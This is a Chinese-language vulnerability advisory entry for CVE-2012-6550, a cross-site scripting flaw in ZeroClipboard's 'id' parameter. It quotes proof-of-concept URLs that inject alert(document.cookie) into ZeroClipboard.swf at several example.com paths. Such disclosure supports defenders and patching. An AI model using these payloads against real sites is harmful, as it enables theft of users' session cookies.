ZeroClipboard ‘id’参数跨站脚本漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121541 漏洞类型 跨站脚本
发布时间 2013-02-20 更新时间 2013-08-06
CVE编号 CVE-2012-6550 CNNVD-ID CNNVD-201302-525
漏洞平台 PHP CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/38329
https://www.securityfocus.com/bid/58116
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201302-525
|漏洞详情
ZeroClipboard是一个利用flash来实现复制到剪贴板功能的开源项目。ZeroClipboard1.1.7和之前版本中的id参数中存在跨站脚本漏洞。攻击者利用该漏洞在受影响站点上下文中不知情用户浏览器上执行任意脚本代码,可窃取基于cookie认证证书进而发起其他攻击。
|漏洞EXP
source: http://www.securityfocus.com/bid/58116/info

ZeroClipboard is prone to a cross-site scripting vulnerability.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

ZeroClipboard versions prior to 1.1.7 are vulnerable. 

http://www.example.com/themes/default/htdocs/flash/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/piwigo/extensions/UserCollections/template/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/filemanager/views/js/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height

http://www.example.com/www.example.coms/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.swf?id=\";))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
|受影响的产品
Bravenewcode Wptouch 1.9.26 Bravenewcode Wptouch 1.9.25 Bravenewcode Wptouch 1.9.24 Bravenewcode Wptouch 1.9.23 Bravenewcode Wptouch 1.9.22 Bravenewcode Wptouch 1.9.21
|参考资料

来源:github.com
链接:https://github.com/jonrohan/ZeroClipboard/commit/51b67b6d696f62aaf003210c08542588222c4913
来源:github.com
链接:https://github.com/jonrohan/ZeroClipboard/blob/master/docs/releases.md#zeroclipboard-114
来源:FULLDISC
名称:20130218XSSvulnerabilitiesinZeroClipboard
链接:http://seclists.org/fulldisclosure/2013/Feb/103
来源:BID
名称:58116
链接:http://www.securityfocus.com/bid/58116